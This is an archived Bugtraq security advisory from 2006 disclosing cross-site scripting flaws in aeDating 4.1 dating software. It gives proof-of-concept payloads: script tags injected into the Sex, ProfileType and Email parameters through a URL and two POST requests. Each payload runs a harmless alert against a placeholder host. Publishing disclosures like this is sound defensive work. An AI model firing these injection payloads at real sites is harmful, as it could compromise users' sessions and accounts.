Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

aeDating 4.1 XSS

From: securityconnection () gmail com
Date: 22 Jun 2006 17:23:15 -0000
Product of AEwebworks Dating Software
http://www.aewebworks.com/
---------------------------
Cross Site Scripting (XSS)
---------------------------
http://target.xx:80/index.php?Sex=";><script>alert(/Elipsis+Security+Test/)</script>&Mode=last
^"G4" Template work^
---
POST /join_form.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 1685
page=1&ID=1&ProfileType="><script>alert(/Elipsis+Security+Test/)</script>&NickName=1&RealName=1&Sex=female&Country=0&City=1&zip=1&Children=0&WhereChildren=
---
POST /forgot.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 65
Email="><script>alert(/Elipsis+Security+Test/)</script>
-----------------
Ellipsis Security
http://www.ellsec.org
Previous By Date Next
Previous By Thread Next

Current thread: